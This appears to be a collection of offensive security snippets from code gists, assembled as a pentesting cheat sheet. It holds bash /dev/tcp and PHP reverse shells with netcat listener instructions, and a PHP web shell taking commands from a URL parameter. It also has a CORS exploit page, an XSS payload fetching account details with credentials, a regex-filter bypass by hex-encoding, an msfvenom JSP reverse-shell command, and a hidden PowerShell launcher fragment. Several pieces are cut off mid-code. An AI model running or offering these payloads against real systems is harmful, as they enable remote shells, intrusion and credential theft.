| powershell -NoP -sta -NonI -W Hidden | |
| function RSC{ | |
| if ($c.Connected -eq $true) { | |
| $c.Close() | |
| }; | |
| if ($p.ExitCode -ne $null) { | |
| $p.Close() | |
| }; | |
| exit; | |
| }; |
| <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.103.123/4444 0>&1'"); | |
| #192.168.103.123 is your local machine ip | |
| #run `nc -vnlp 4444` on your local machine |
| <?php passthru($_GET['cmd']); ?> | |
| #http://victim.com?cmd=whoami |
| nmap -v -sS -A -T4 192.168.11.1-255 |
| /bin/bash -c '/bin/bash -i > /dev/tcp/127.0.0.1/8181 0<&1 2>&1&' | |
| # OR | |
| /bin/bash -i >& /dev/tcp/127.0.0.1/8181 0>&1 | |
| #run `nc -vnlp 8181` on your local machine |
| <html> | |
| <body> | |
| <h2>CORS Exploit</h2> | |
| <p>https://gist.github.com/enderphan94</p> | |
| <div id="demo"> | |
| <button type="button" onclick="cors()">Exploit</button> | |
| </div> | |
| <script> | |
| function cors() { | |
| var xhr = new XMLHttpRequest(); |
| <script>var req = new XMLHttpRequest(); req.open('get','https://acb01fc81f8f9958806a0dee004900a5.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send();</script> | |
| //https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script> | |
| //if it does not pop-up, double-check in the console |
| #!/usr/bin/python | |
| # DLL Encoder - Insecurety Research | |
| import sys | |
| print "Encodes a DLL as a base64 encoded textfile" | |
| if (len(sys.argv) != 3): | |
| print "Usage: %s <Path To DLL> <Outfile>" %(sys.argv[0]) | |
| print "Eg: %s C:\\windows\win32.dll encoded.txt" %(sys.argv[0]) | |
| sys.exit(0) |
JavaScript strings can by design be composed of hex-encoded characters, in addition to other encodings. So we should be able to hex-encode our forward slashes and bypass the restrictions of the regex parsing. We gotta do some hex-encoding scheme to the cmd string
\\x2fbin\\x2fbash
e.g:
POST /users HTTP/1.1
Host: 172.118.132.4
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f raw > shell.jsp